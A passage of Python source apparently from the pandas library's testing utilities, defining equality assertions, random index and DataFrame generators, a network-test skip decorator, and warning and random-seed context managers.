assert_index_equal(
left.index,
right.index,
exact=check_index_type,
check_names=check_names,
check_exact=check_exact,
check_categorical=check_categorical,
check_order=not check_like,
rtol=rtol,
atol=atol,
obj=f"{obj}.index",
)
# column comparison
assert_index_equal(
left.columns,
right.columns,
exact=check_column_type,
check_names=check_names,
check_exact=check_exact,
check_categorical=check_categorical,
check_order=not check_like,
rtol=rtol,
atol=atol,
obj=f"{obj}.columns",
)
if check_like:
left, right = left.reindex_like(right), right
# compare by blocks
if by_blocks:
rblocks = right._to_dict_of_blocks()
lblocks = left._to_dict_of_blocks()
for dtype in list(set(list(lblocks.keys()) + list(rblocks.keys()))):
assert dtype in lblocks
assert dtype in rblocks
assert_frame_equal(
lblocks[dtype], rblocks[dtype], check_dtype=check_dtype, obj=obj
)
# compare by columns
else:
for i, col in enumerate(left.columns):
assert col in right
lcol = left.iloc[:, i]
rcol = right.iloc[:, i]
assert_series_equal(
lcol,
rcol,
check_dtype=check_dtype,
check_index_type=check_index_type,
check_exact=check_exact,
check_names=check_names,
check_datetimelike_compat=check_datetimelike_compat,
check_categorical=check_categorical,
check_freq=check_freq,
obj=f'{obj}.iloc[:, {i}] (column name="{col}")',
rtol=rtol,
atol=atol,
)
def assert_equal(left, right, **kwargs):
"""
Wrapper for tm.assert_*_equal to dispatch to the appropriate test function.
Parameters
----------
left, right : Index, Series, DataFrame, ExtensionArray, or np.ndarray
The two items to be compared.
**kwargs
All keyword arguments are passed through to the underlying assert method.
"""
__tracebackhide__ = True
if isinstance(left, pd.Index):
assert_index_equal(left, right, **kwargs)
if isinstance(left, (pd.DatetimeIndex, pd.TimedeltaIndex)):
assert left.freq == right.freq, (left.freq, right.freq)
elif isinstance(left, pd.Series):
assert_series_equal(left, right, **kwargs)
elif isinstance(left, pd.DataFrame):
assert_frame_equal(left, right, **kwargs)
elif isinstance(left, IntervalArray):
assert_interval_array_equal(left, right, **kwargs)
elif isinstance(left, PeriodArray):
assert_period_array_equal(left, right, **kwargs)
elif isinstance(left, DatetimeArray):
assert_datetime_array_equal(left, right, **kwargs)
elif isinstance(left, TimedeltaArray):
assert_timedelta_array_equal(left, right, **kwargs)
elif isinstance(left, ExtensionArray):
assert_extension_array_equal(left, right, **kwargs)
elif isinstance(left, np.ndarray):
assert_numpy_array_equal(left, right, **kwargs)
elif isinstance(left, str):
assert kwargs == {}
assert left == right
else:
raise NotImplementedError(type(left))
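# Example (editor's sketch, not part of pandas): assert_equal dispatches on
# the type of `left`; the _demo_* name is a hypothetical addition.
def _demo_assert_equal_dispatch():
    assert_equal(Index([1, 2]), Index([1, 2]))        # -> assert_index_equal
    assert_equal(np.array([1, 2]), np.array([1, 2]))  # -> assert_numpy_array_equal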
def box_expected(expected, box_cls, transpose=True):
"""
Helper function to wrap the expected output of a test in a given box_class.
Parameters
----------
expected : np.ndarray, Index, Series
box_cls : {Index, Series, DataFrame}
Returns
-------
subclass of box_cls
"""
if box_cls is pd.array:
expected = pd.array(expected)
elif box_cls is pd.Index:
expected = pd.Index(expected)
elif box_cls is pd.Series:
expected = pd.Series(expected)
elif box_cls is pd.DataFrame:
expected = pd.Series(expected).to_frame()
if transpose:
            # for vector operations, we need a DataFrame to be a single-row,
# not a single-column, in order to operate against non-DataFrame
# vectors of the same length.
expected = expected.T
elif box_cls is PeriodArray:
# the PeriodArray constructor is not as flexible as period_array
expected = period_array(expected)
elif box_cls is DatetimeArray:
expected = DatetimeArray(expected)
elif box_cls is TimedeltaArray:
expected = TimedeltaArray(expected)
elif box_cls is np.ndarray:
expected = np.array(expected)
elif box_cls is to_array:
expected = to_array(expected)
else:
raise NotImplementedError(box_cls)
return expected
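# Example (editor's sketch, not part of pandas): wrap the same expected values
# in different boxes so one test body can run against several containers; the
# _demo_* name is a hypothetical addition.
def _demo_box_expected():
    data = [1, 2, 3]
    idx = box_expected(data, pd.Index)
    ser = box_expected(data, pd.Series)
    df = box_expected(data, pd.DataFrame)  # single-row frame (transposed)
    return idx, ser, df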
def to_array(obj):
# temporary implementation until we get pd.array in place
dtype = getattr(obj, "dtype", None)
if is_period_dtype(dtype):
return period_array(obj)
elif is_datetime64_dtype(dtype) or is_datetime64tz_dtype(dtype):
return DatetimeArray._from_sequence(obj)
elif is_timedelta64_dtype(dtype):
return TimedeltaArray._from_sequence(obj)
else:
return np.array(obj)
# -----------------------------------------------------------------------------
# Sparse
def assert_sp_array_equal(left, right):
"""
Check that the left and right SparseArray are equal.
Parameters
----------
left : SparseArray
right : SparseArray
"""
_check_isinstance(left, right, pd.arrays.SparseArray)
assert_numpy_array_equal(left.sp_values, right.sp_values)
# SparseIndex comparison
assert isinstance(left.sp_index, pd._libs.sparse.SparseIndex)
assert isinstance(right.sp_index, pd._libs.sparse.SparseIndex)
left_index = left.sp_index
right_index = right.sp_index
if not left_index.equals(right_index):
raise_assert_detail(
"SparseArray.index", "index are not equal", left_index, right_index
)
else:
        # indexes are equal; nothing further to check
        pass
assert_attr_equal("fill_value", left, right)
assert_attr_equal("dtype", left, right)
assert_numpy_array_equal(left.to_dense(), right.to_dense())
# -----------------------------------------------------------------------------
# Others
def assert_contains_all(iterable, dic):
for k in iterable:
assert k in dic, f"Did not contain item: {repr(k)}"
def assert_copy(iter1, iter2, **eql_kwargs):
"""
iter1, iter2: iterables that produce elements
comparable with assert_almost_equal
Checks that the elements are equal, but not
the same object. (Does not check that items
in sequences are also not the same object)
"""
for elem1, elem2 in zip(iter1, iter2):
assert_almost_equal(elem1, elem2, **eql_kwargs)
msg = (
f"Expected object {repr(type(elem1))} and object {repr(type(elem2))} to be "
"different objects, but they were the same object."
)
assert elem1 is not elem2, msg
def getCols(k):
return string.ascii_uppercase[:k]
# make index
def makeStringIndex(k=10, name=None):
return Index(rands_array(nchars=10, size=k), name=name)
def makeUnicodeIndex(k=10, name=None):
return Index(randu_array(nchars=10, size=k), name=name)
def makeCategoricalIndex(k=10, n=3, name=None, **kwargs):
""" make a length k index or n categories """
x = rands_array(nchars=4, size=n)
return CategoricalIndex(
Categorical.from_codes(np.arange(k) % n, categories=x), name=name, **kwargs
)
def makeIntervalIndex(k=10, name=None, **kwargs):
""" make a length k IntervalIndex """
x = np.linspace(0, 100, num=(k + 1))
return IntervalIndex.from_breaks(x, name=name, **kwargs)
def makeBoolIndex(k=10, name=None):
if k == 1:
return Index([True], name=name)
elif k == 2:
return Index([False, True], name=name)
return Index([False, True] + [False] * (k - 2), name=name)
def makeIntIndex(k=10, name=None):
return Index(list(range(k)), name=name)
def makeUIntIndex(k=10, name=None):
return Index([2 ** 63 + i for i in range(k)], name=name)
def makeRangeIndex(k=10, name=None, **kwargs):
return RangeIndex(0, k, 1, name=name, **kwargs)
def makeFloatIndex(k=10, name=None):
values = sorted(np.random.random_sample(k)) - np.random.random_sample(1)
return Index(values * (10 ** np.random.randint(0, 9)), name=name)
def makeDateIndex(k=10, freq="B", name=None, **kwargs):
dt = datetime(2000, 1, 1)
dr = bdate_range(dt, periods=k, freq=freq, name=name)
return DatetimeIndex(dr, name=name, **kwargs)
def makeTimedeltaIndex(k=10, freq="D", name=None, **kwargs):
return pd.timedelta_range(start="1 day", periods=k, freq=freq, name=name, **kwargs)
def makePeriodIndex(k=10, name=None, **kwargs):
dt = datetime(2000, 1, 1)
return pd.period_range(start=dt, periods=k, freq="B", name=name, **kwargs)
def makeMultiIndex(k=10, names=None, **kwargs):
return MultiIndex.from_product((("foo", "bar"), (1, 2)), names=names, **kwargs)
_names = [
"Alice",
"Bob",
"Charlie",
"Dan",
"Edith",
"Frank",
"George",
"Hannah",
"Ingrid",
"Jerry",
"Kevin",
"Laura",
"Michael",
"Norbert",
"Oliver",
"Patricia",
"Quinn",
"Ray",
"Sarah",
"Tim",
"Ursula",
"Victor",
"Wendy",
"Xavier",
"Yvonne",
"Zelda",
]
def _make_timeseries(start="2000-01-01", end="2000-12-31", freq="1D", seed=None):
"""
Make a DataFrame with a DatetimeIndex
Parameters
----------
start : str or Timestamp, default "2000-01-01"
The start of the index. Passed to date_range with `freq`.
end : str or Timestamp, default "2000-12-31"
The end of the index. Passed to date_range with `freq`.
freq : str or Freq
The frequency to use for the DatetimeIndex
seed : int, optional
The random state seed.
        Columns are:
        * name : object dtype with string names
        * id : int dtype with Poisson-distributed integers (mean 1000)
        * x, y : float dtype, uniform in [-1, 1)
Examples
--------
>>> _make_timeseries()
id name x y
timestamp
2000-01-01 982 Frank 0.031261 0.986727
2000-01-02 1025 Edith -0.086358 -0.032920
2000-01-03 982 Edith 0.473177 0.298654
2000-01-04 1009 Sarah 0.534344 -0.750377
2000-01-05 963 Zelda -0.271573 0.054424
... ... ... ... ...
2000-12-27 980 Ingrid -0.132333 -0.422195
2000-12-28 972 Frank -0.376007 -0.298687
2000-12-29 1009 Ursula -0.865047 -0.503133
2000-12-30 1000 Hannah -0.063757 -0.507336
2000-12-31 972 Tim -0.869120 0.531685
"""
index = pd.date_range(start=start, end=end, freq=freq, name="timestamp")
n = len(index)
state = np.random.RandomState(seed)
columns = {
"name": state.choice(_names, size=n),
"id": state.poisson(1000, size=n),
"x": state.rand(n) * 2 - 1,
"y": state.rand(n) * 2 - 1,
}
df = pd.DataFrame(columns, index=index, columns=sorted(columns))
if df.index[-1] == end:
df = df.iloc[:-1]
return df
def index_subclass_makers_generator():
make_index_funcs = [
makeDateIndex,
makePeriodIndex,
makeTimedeltaIndex,
makeRangeIndex,
makeIntervalIndex,
makeCategoricalIndex,
makeMultiIndex,
]
yield from make_index_funcs
def all_timeseries_index_generator(k=10):
"""
Generator which can be iterated over to get instances of all the classes
which represent time-series.
Parameters
----------
k: length of each of the index instances
"""
make_index_funcs = [makeDateIndex, makePeriodIndex, makeTimedeltaIndex]
for make_index_func in make_index_funcs:
# pandas\_testing.py:1986: error: Cannot call function of unknown type
yield make_index_func(k=k) # type: ignore[operator]
# make series
def makeFloatSeries(name=None):
index = makeStringIndex(_N)
return Series(randn(_N), index=index, name=name)
def makeStringSeries(name=None):
index = makeStringIndex(_N)
return Series(randn(_N), index=index, name=name)
def makeObjectSeries(name=None):
data = makeStringIndex(_N)
data = Index(data, dtype=object)
index = makeStringIndex(_N)
return Series(data, index=index, name=name)
def getSeriesData():
index = makeStringIndex(_N)
return {c: Series(randn(_N), index=index) for c in getCols(_K)}
def makeTimeSeries(nper=None, freq="B", name=None):
if nper is None:
nper = _N
return Series(randn(nper), index=makeDateIndex(nper, freq=freq), name=name)
def makePeriodSeries(nper=None, name=None):
if nper is None:
nper = _N
return Series(randn(nper), index=makePeriodIndex(nper), name=name)
def getTimeSeriesData(nper=None, freq="B"):
return {c: makeTimeSeries(nper, freq) for c in getCols(_K)}
def getPeriodData(nper=None):
return {c: makePeriodSeries(nper) for c in getCols(_K)}
# make frame
def makeTimeDataFrame(nper=None, freq="B"):
data = getTimeSeriesData(nper, freq)
return DataFrame(data)
def makeDataFrame():
data = getSeriesData()
return DataFrame(data)
def getMixedTypeDict():
index = Index(["a", "b", "c", "d", "e"])
data = {
"A": [0.0, 1.0, 2.0, 3.0, 4.0],
"B": [0.0, 1.0, 0.0, 1.0, 0.0],
"C": ["foo1", "foo2", "foo3", "foo4", "foo5"],
"D": bdate_range("1/1/2009", periods=5),
}
return index, data
def makeMixedDataFrame():
return DataFrame(getMixedTypeDict()[1])
def makePeriodFrame(nper=None):
data = getPeriodData(nper)
return DataFrame(data)
def makeCustomIndex(
nentries, nlevels, prefix="#", names=False, ndupe_l=None, idx_type=None
):
"""
    Create an index/multiindex with given dimensions, levels, names, etc.
nentries - number of entries in index
    nlevels - number of levels (> 1 produces multiindex)
prefix - a string prefix for labels
names - (Optional), bool or list of strings. if True will use default
names, if false will use no names, if a list is given, the name of
each level in the index will be taken from the list.
ndupe_l - (Optional), list of ints, the number of rows for which the
label will repeated at the corresponding level, you can specify just
the first few, the rest will use the default ndupe_l of 1.
len(ndupe_l) <= nlevels.
idx_type - "i"/"f"/"s"/"u"/"dt"/"p"/"td".
If idx_type is not None, `idx_nlevels` must be 1.
"i"/"f" creates an integer/float index,
"s"/"u" creates a string/unicode index
"dt" create a datetime index.
"td" create a datetime index.
if unspecified, string labels will be generated.
"""
if ndupe_l is None:
ndupe_l = [1] * nlevels
assert is_sequence(ndupe_l) and len(ndupe_l) <= nlevels
assert names is None or names is False or names is True or len(names) is nlevels
assert idx_type is None or (
idx_type in ("i", "f", "s", "u", "dt", "p", "td") and nlevels == 1
)
if names is True:
# build default names
names = [prefix + str(i) for i in range(nlevels)]
if names is False:
# pass None to index constructor for no name
names = None
# make singleton case uniform
if isinstance(names, str) and nlevels == 1:
names = [names]
# specific 1D index type requested?
idx_func = dict(
i=makeIntIndex,
f=makeFloatIndex,
s=makeStringIndex,
u=makeUnicodeIndex,
dt=makeDateIndex,
td=makeTimedeltaIndex,
p=makePeriodIndex,
).get(idx_type)
if idx_func:
# pandas\_testing.py:2120: error: Cannot call function of unknown type
idx = idx_func(nentries) # type: ignore[operator]
# but we need to fill in the name
if names:
idx.name = names[0]
return idx
elif idx_type is not None:
raise ValueError(
f"{repr(idx_type)} is not a legal value for `idx_type`, "
"use 'i'/'f'/'s'/'u'/'dt'/'p'/'td'."
)
if len(ndupe_l) < nlevels:
ndupe_l.extend([1] * (nlevels - len(ndupe_l)))
assert len(ndupe_l) == nlevels
assert all(x > 0 for x in ndupe_l)
tuples = []
for i in range(nlevels):
def keyfunc(x):
import re
numeric_tuple = re.sub(r"[^\d_]_?", "", x).split("_")
return [int(num) for num in numeric_tuple]
# build a list of lists to create the index from
div_factor = nentries // ndupe_l[i] + 1
# pandas\_testing.py:2148: error: Need type annotation for 'cnt'
cnt = Counter() # type: ignore[var-annotated]
for j in range(div_factor):
label = f"{prefix}_l{i}_g{j}"
cnt[label] = ndupe_l[i]
# cute Counter trick
result = sorted(cnt.elements(), key=keyfunc)[:nentries]
tuples.append(result)
tuples = list(zip(*tuples))
# convert tuples to index
if nentries == 1:
# we have a single level of tuples, i.e. a regular Index
index = Index(tuples[0], name=names[0])
elif nlevels == 1:
name = None if names is None else names[0]
index = Index((x[0] for x in tuples), name=name)
else:
index = MultiIndex.from_tuples(tuples, names=names)
return index
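# Illustrative usage sketch (added for clarity, not part of the original
# module): build a 2-level MultiIndex with default names via makeCustomIndex.
def _example_make_custom_index():
    idx = makeCustomIndex(nentries=6, nlevels=2, names=True)
    # six entries across two levels, named "#0" and "#1" (prefix + level number)
    assert idx.nlevels == 2 and len(idx) == 6
    return idx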
def makeCustomDataframe(
nrows,
ncols,
c_idx_names=True,
r_idx_names=True,
c_idx_nlevels=1,
r_idx_nlevels=1,
data_gen_f=None,
c_ndupe_l=None,
r_ndupe_l=None,
dtype=None,
c_idx_type=None,
r_idx_type=None,
):
"""
Create a DataFrame using supplied parameters.
Parameters
----------
nrows, ncols - number of data rows/cols
c_idx_names, r_idx_names - False/True/list of strings, yields no names,
default names or uses the provided names for the levels of the
corresponding index. You can provide a single string when
c_idx_nlevels ==1.
c_idx_nlevels - number of levels in columns index. > 1 will yield MultiIndex
r_idx_nlevels - number of levels in rows index. > 1 will yield MultiIndex
data_gen_f - a function f(row,col) which returns the data value
at that position, the default generator used yields values of the form
"RxCy" based on position.
c_ndupe_l, r_ndupe_l - list of integers, determines the number
of duplicates for each label at a given level of the corresponding
index. The default `None` value produces a multiplicity of 1 across
all levels, i.e. a unique index. Will accept a partial list of length
N < idx_nlevels, for just the first N levels. If ndupe doesn't divide
nrows/ncol, the last label might have lower multiplicity.
dtype - passed to the DataFrame constructor as is, in case you wish to
have more control in conjunction with a custom `data_gen_f`
r_idx_type, c_idx_type - "i"/"f"/"s"/"u"/"dt"/"td".
If idx_type is not None, `idx_nlevels` must be 1.
"i"/"f" creates an integer/float index,
"s"/"u" creates a string/unicode index
"dt" create a datetime index.
"td" create a timedelta index.
if unspecified, string labels will be generated.
Examples
--------
# 5 row, 3 columns, default names on both, single index on both axis
>> makeCustomDataframe(5,3)
# make the data a random int between 1 and 100
>> makeCustomDataframe(5,3,data_gen_f=lambda r,c:randint(1,100))
# 2-level multiindex on rows with each label duplicated
# twice on first level, default names on both axis, single
# index on both axis
>> a=makeCustomDataframe(5,3,r_idx_nlevels=2,r_ndupe_l=[2])
# DatetimeIndex on row, index with unicode labels on columns
# no names on either axis
>> a=makeCustomDataframe(5,3,c_idx_names=False,r_idx_names=False,
r_idx_type="dt",c_idx_type="u")
# 4-level multiindex on rows with names provided, 2-level multiindex
# on columns with default labels and default names.
>> a=makeCustomDataframe(5,3,r_idx_nlevels=4,
r_idx_names=["FEE","FI","FO","FAM"],
c_idx_nlevels=2)
>> a=makeCustomDataframe(5,3,r_idx_nlevels=2,c_idx_nlevels=4)
"""
assert c_idx_nlevels > 0
assert r_idx_nlevels > 0
assert r_idx_type is None or (
r_idx_type in ("i", "f", "s", "u", "dt", "p", "td") and r_idx_nlevels == 1
)
assert c_idx_type is None or (
c_idx_type in ("i", "f", "s", "u", "dt", "p", "td") and c_idx_nlevels == 1
)
columns = makeCustomIndex(
ncols,
nlevels=c_idx_nlevels,
prefix="C",
names=c_idx_names,
ndupe_l=c_ndupe_l,
idx_type=c_idx_type,
)
index = makeCustomIndex(
nrows,
nlevels=r_idx_nlevels,
prefix="R",
names=r_idx_names,
ndupe_l=r_ndupe_l,
idx_type=r_idx_type,
)
# by default, generate data based on location
if data_gen_f is None:
data_gen_f = lambda r, c: f"R{r}C{c}"
data = [[data_gen_f(r, c) for c in range(ncols)] for r in range(nrows)]
return DataFrame(data, index, columns, dtype=dtype)
def _create_missing_idx(nrows, ncols, density, random_state=None):
if random_state is None:
random_state = np.random
else:
random_state = np.random.RandomState(random_state)
# below is cribbed from scipy.sparse
size = int(np.round((1 - density) * nrows * ncols))
# generate a few more to ensure unique values
min_rows = 5
fac = 1.02
extra_size = min(size + min_rows, fac * size)
def _gen_unique_rand(rng, _extra_size):
ind = rng.rand(int(_extra_size))
return np.unique(np.floor(ind * nrows * ncols))[:size]
ind = _gen_unique_rand(random_state, extra_size)
while ind.size < size:
extra_size *= 1.05
ind = _gen_unique_rand(random_state, extra_size)
j = np.floor(ind * 1.0 / nrows).astype(int)
i = (ind - j * nrows).astype(int)
return i.tolist(), j.tolist()
def makeMissingDataframe(density=0.9, random_state=None):
df = makeDataFrame()
# pandas\_testing.py:2306: error: "_create_missing_idx" gets multiple
# values for keyword argument "density" [misc]
# pandas\_testing.py:2306: error: "_create_missing_idx" gets multiple
# values for keyword argument "random_state" [misc]
i, j = _create_missing_idx( # type: ignore[misc]
*df.shape, density=density, random_state=random_state
)
df.values[i, j] = np.nan
return df
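# Illustrative sketch (added for clarity): the density argument controls the
# fraction of cells that survive, so roughly 1 - density of the frame is NaN.
def _example_missing_density():
    df = makeMissingDataframe(density=0.75, random_state=42)
    # about 25% of the cells should now be missing
    return df.isna().to_numpy().mean()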
def optional_args(decorator):
"""
allows a decorator to take optional positional and keyword arguments.
Assumes that taking a single, callable, positional argument means that
it is decorating a function, i.e. something like this::
@my_decorator
def function(): pass
Calls decorator with decorator(f, *args, **kwargs)
"""
@wraps(decorator)
def wrapper(*args, **kwargs):
def dec(f):
return decorator(f, *args, **kwargs)
is_decorating = not kwargs and len(args) == 1 and callable(args[0])
if is_decorating:
f = args[0]
# pandas\_testing.py:2331: error: Incompatible types in assignment
# (expression has type "List[<nothing>]", variable has type
# "Tuple[Any, ...]")
args = [] # type: ignore[assignment]
return dec(f)
else:
return dec
return wrapper
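# Minimal sketch (added for illustration) of a decorator built on top of
# optional_args: it can be applied bare or called with keyword arguments.
@optional_args
def _tagged(f, label="default"):
    @wraps(f)
    def inner(*args, **kwargs):
        return (label, f(*args, **kwargs))
    return inner
# Both spellings work thanks to optional_args:
#   @_tagged                 -> label "default"
#   @_tagged(label="custom") -> label "custom"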
# skip tests on exceptions with this message
_network_error_messages = (
# 'urlopen error timed out',
# 'timeout: timed out',
# 'socket.timeout: timed out',
"timed out",
"Server Hangup",
"HTTP Error 503: Service Unavailable",
"502: Proxy Error",
"HTTP Error 502: internal error",
"HTTP Error 502",
"HTTP Error 503",
"HTTP Error 403",
"HTTP Error 400",
"Temporary failure in name resolution",
"Name or service not known",
"Connection refused",
"certificate verify",
)
# or this e.errno/e.reason.errno
_network_errno_vals = (
101, # Network is unreachable
111, # Connection refused
110, # Connection timed out
104, # Connection reset Error
54, # Connection reset by peer
60, # urllib.error.URLError: [Errno 60] Connection timed out
)
# Both of the above shouldn't mask real issues such as 404's
# or refused connections (changed DNS).
# But some tests (test_data yahoo) contact incredibly flakey
# servers.
# and conditionally raise on exception types in _get_default_network_errors
def _get_default_network_errors():
# Lazy import for http.client because it imports many things from the stdlib
import http.client
return (IOError, http.client.HTTPException, TimeoutError)
def can_connect(url, error_classes=None):
"""
Try to connect to the given url. True if succeeds, False if IOError
raised
Parameters
----------
url : basestring
The URL to try to connect to
Returns
-------
connectable : bool
Return True if no IOError (unable to connect) or URLError (bad url) was
raised
"""
if error_classes is None:
error_classes = _get_default_network_errors()
try:
with urlopen(url):
pass
except error_classes:
return False
else:
return True
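# Usage sketch (illustrative): can_connect returns a plain bool, so callers
# can gate optional network work without handling exceptions themselves.
def _example_can_connect(url="https://www.google.com"):
    return "online" if can_connect(url) else "offline"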
@optional_args
def network(
t,
url="https://www.google.com",
raise_on_error=_RAISE_NETWORK_ERROR_DEFAULT,
check_before_test=False,
error_classes=None,
skip_errnos=_network_errno_vals,
_skip_on_messages=_network_error_messages,
):
"""
Label a test as requiring a network connection and, if an error is
encountered, only raise it if a network connection can in fact be made
(otherwise the test is skipped).
This assumes an added contract for your test: you must assert that, under
normal conditions, your test will ONLY fail if it does not have network
connectivity.
You can call this in 3 ways: as a standard decorator, with keyword
arguments, or with a positional argument that is the url to check.
Parameters
----------
t : callable
The test requiring network connectivity.
url : path
The url to test via ``pandas.io.common.urlopen`` to check
for connectivity. Defaults to 'https://www.google.com'.
raise_on_error : bool
If True, never catches errors.
check_before_test : bool
If True, checks connectivity before running the test case.
error_classes : tuple or Exception
error classes to ignore. If not in ``error_classes``, raises the error.
defaults to IOError. Be careful about changing the error classes here.
skip_errnos : iterable of int
Any exception that has .errno or .reason.errno set to one
of these values will be skipped with an appropriate
message.
_skip_on_messages: iterable of string
any exception e for which one of the strings is
a substring of str(e) will be skipped with an appropriate
message. Intended to suppress errors where an errno isn't available.
Notes
-----
* ``raise_on_error`` supersedes ``check_before_test``
Returns
-------
t : callable
The decorated test ``t``, with checks for connectivity errors.
Example
-------
Tests decorated with @network will fail if it's possible to make a network
connection to another URL (defaults to google.com)::
>>> from pandas._testing import network
>>> from pandas.io.common import urlopen
>>> @network
... def test_network():
... with urlopen("rabbit://bonanza.com"):
... pass
Traceback (most recent call last):
...
URLError: <urlopen error unknown url type: rabbit>
You can specify alternative URLs::
>>> @network("https://www.yahoo.com")
... def test_something_with_yahoo():
... raise IOError("Failure Message")
>>> test_something_with_yahoo()
Traceback (most recent call last):
...
IOError: Failure Message
If you set check_before_test, it will check the url first and not run the
test on failure::
>>> @network("failing://url.blaher", check_before_test=True)
... def test_something():
... print("I ran!")
... raise ValueError("Failure")
>>> test_something()
Traceback (most recent call last):
...
Errors not related to networking will always be raised.
"""
from pytest import skip
if error_classes is None:
error_classes = _get_default_network_errors()
t.network = True
@wraps(t)
def wrapper(*args, **kwargs):
if (
check_before_test
and not raise_on_error
and not can_connect(url, error_classes)
):
skip()
try:
return t(*args, **kwargs)
except Exception as err:
errno = getattr(err, "errno", None)
if errno is None and hasattr(err, "reason"):
# pandas\_testing.py:2521: error: "Exception" has no attribute
# "reason"
errno = getattr(err.reason, "errno", None) # type: ignore[attr-defined]
if errno in skip_errnos:
skip(f"Skipping test due to known errno and error {err}")
e_str = str(err)
if any(m.lower() in e_str.lower() for m in _skip_on_messages):
skip(
f"Skipping test because exception message is known and error {err}"
)
if not isinstance(err, error_classes):
raise
if raise_on_error or can_connect(url, error_classes):
raise
else:
skip(f"Skipping test due to lack of connectivity and error {err}")
return wrapper
with_connectivity_check = network
@contextmanager
def assert_produces_warning(
expected_warning: Optional[Union[Type[Warning], bool]] = Warning,
filter_level="always",
check_stacklevel: bool = True,
raise_on_extra_warnings: bool = True,
match: Optional[str] = None,
):
"""
Context manager for running code expected to either raise a specific
warning, or not raise any warnings. Verifies that the code raises the
expected warning, and that it does not raise any other unexpected
warnings. It is basically a wrapper around ``warnings.catch_warnings``.
Parameters
----------
expected_warning : {Warning, False, None}, default Warning
The type of warning to check for. ``Warning`` is the base
class for all warnings. To check that no warning is returned,
specify ``False`` or ``None``.
filter_level : str or None, default "always"
Specifies whether warnings are ignored, displayed, or turned
into errors.
Valid values are:
* "error" - turns matching warnings into exceptions
* "ignore" - discard the warning
* "always" - always emit a warning
* "default" - print the warning the first time it is generated
from each location
* "module" - print the warning the first time it is generated
from each module
* "once" - print the warning the first time it is generated
check_stacklevel : bool, default True
If True, displays the line that called the function containing
the warning to show where the function is called. Otherwise, the
line that implements the function is displayed.
raise_on_extra_warnings : bool, default True
Whether extra warnings not of the type `expected_warning` should
cause the test to fail.
match : str, optional
Match warning message.
Examples
--------
>>> import warnings
>>> with assert_produces_warning():
... warnings.warn(UserWarning())
...
>>> with assert_produces_warning(False):
... warnings.warn(RuntimeWarning())
...
Traceback (most recent call last):
...
AssertionError: Caused unexpected warning(s): ['RuntimeWarning'].
>>> with assert_produces_warning(UserWarning):
... warnings.warn(RuntimeWarning())
Traceback (most recent call last):
...
AssertionError: Did not see expected warning of class 'UserWarning'.
.. warning:: This is *not* thread-safe.
"""
__tracebackhide__ = True
with warnings.catch_warnings(record=True) as w:
saw_warning = False
matched_message = False
warnings.simplefilter(filter_level)
yield w
extra_warnings = []
for actual_warning in w:
if not expected_warning:
continue
expected_warning = cast(Type[Warning], expected_warning)
if issubclass(actual_warning.category, expected_warning):
saw_warning = True
if check_stacklevel and issubclass(
actual_warning.category, (FutureWarning, DeprecationWarning)
):
_assert_raised_with_correct_stacklevel(actual_warning)
if match is not None and re.search(match, str(actual_warning.message)):
matched_message = True
else:
extra_warnings.append(
(
actual_warning.category.__name__,
actual_warning.message,
actual_warning.filename,
actual_warning.lineno,
)
)
if expected_warning:
expected_warning = cast(Type[Warning], expected_warning)
if not saw_warning:
raise AssertionError(
f"Did not see expected warning of class "
f"{repr(expected_warning.__name__)}"
)
if match and not matched_message:
raise AssertionError(
f"Did not see warning {repr(expected_warning.__name__)} "
f"matching {match}"
)
if raise_on_extra_warnings and extra_warnings:
raise AssertionError(
f"Caused unexpected warning(s): {repr(extra_warnings)}"
)
def _assert_raised_with_correct_stacklevel(
actual_warning: warnings.WarningMessage,
) -> None:
from inspect import getframeinfo, stack
caller = getframeinfo(stack()[3][0])
msg = (
"Warning not set with correct stacklevel. "
f"File where warning is raised: {actual_warning.filename} != "
f"{caller.filename}. Warning message: {actual_warning.message}"
)
assert actual_warning.filename == caller.filename, msg
class RNGContext:
"""
Context manager to set the numpy random number generator seed. Restores
the original RNG state upon exiting the context manager.
Parameters
----------
seed : int
Seed for numpy.random.seed
Examples
--------
with RNGContext(42):
np.random.randn()
"""
def __init__(self, seed):
self.seed = seed
def __enter__(self):
self.start_state = np.random.get_state()
np.random.seed(self.seed)
def __exit__(self, exc_type, exc_value, traceback):
np.random.set_state(self.start_state)
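# Illustrative sketch (added for clarity): two draws under the same seed are
# identical, and the global numpy RNG state is restored on exit.
def _example_rng_context():
    with RNGContext(42):
        first = np.random.randn()
    with RNGContext(42):
        second = np.random.randn()
    assert first == second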
@contextmanager
def with_csv_dialect(name, **kwargs):
"""
Context manager to temporarily register a CSV dialect for parsing CSV.
Parameters
----------
name : str
The name of the dialect.
kwargs : mapping
The parameters for the dialect.
Raises
------
ValueError : the name of the dialect conflicts with a builtin one.
See Also
--------
csv : Python's CSV library.
"""
import csv
_BUILTIN_DIALECTS = {"excel", "excel-tab", "unix"}
if name in _BUILTIN_DIALECTS:
raise ValueError("Cannot override builtin dialect.")
csv.register_dialect(name, **kwargs)
yield
csv.unregister_dialect(name)
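# Usage sketch (illustrative): temporarily register a pipe-delimited dialect;
# it is unregistered again as soon as the block exits.
def _example_csv_dialect():
    import csv
    from io import StringIO
    with with_csv_dialect("piped", delimiter="|"):
        return next(csv.reader(StringIO("a|b|c"), dialect="piped"))  # ['a', 'b', 'c']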
@contextmanager
def use_numexpr(use, min_elements=None):
from pandas.core.computation import expressions as expr
if min_elements is None:
min_elements = expr._MIN_ELEMENTS
olduse = expr.USE_NUMEXPR
oldmin = expr._MIN_ELEMENTS
expr.set_use_numexpr(use)
expr._MIN_ELEMENTS = min_elements
yield
expr._MIN_ELEMENTS = oldmin
expr.set_use_numexpr(olduse)
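# Illustrative sketch (added for clarity): lowering min_elements forces
# numexpr-backed evaluation even for small frames (when numexpr is installed).
def _example_use_numexpr():
    df = makeDataFrame()
    with use_numexpr(True, min_elements=1):
        return df + df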
def test_parallel(num_threads=2, kwargs_list=None):
"""
Decorator to run the same function multiple times in parallel.
Parameters
----------
num_threads : int, optional
The number of times the function is run in parallel.
kwargs_list : list of dicts, optional
The list of kwargs to update original
function kwargs on different threads.
Notes
-----
This decorator does not pass the return value of the decorated function.
Original from scikit-image:
https://github.com/scikit-image/scikit-image/pull/1519
"""
assert num_threads > 0
has_kwargs_list = kwargs_list is not None
if has_kwargs_list:
assert len(kwargs_list) == num_threads
import threading
def wrapper(func):
@wraps(func)
def inner(*args, **kwargs):
if has_kwargs_list:
update_kwargs = lambda i: dict(kwargs, **kwargs_list[i])
else:
update_kwargs = lambda i: kwargs
threads = []
for i in range(num_threads):
updated_kwargs = update_kwargs(i)
thread = threading.Thread(target=func, args=args, kwargs=updated_kwargs)
threads.append(thread)
for thread in threads:
thread.start()
for thread in threads:
thread.join()
return inner
return wrapper
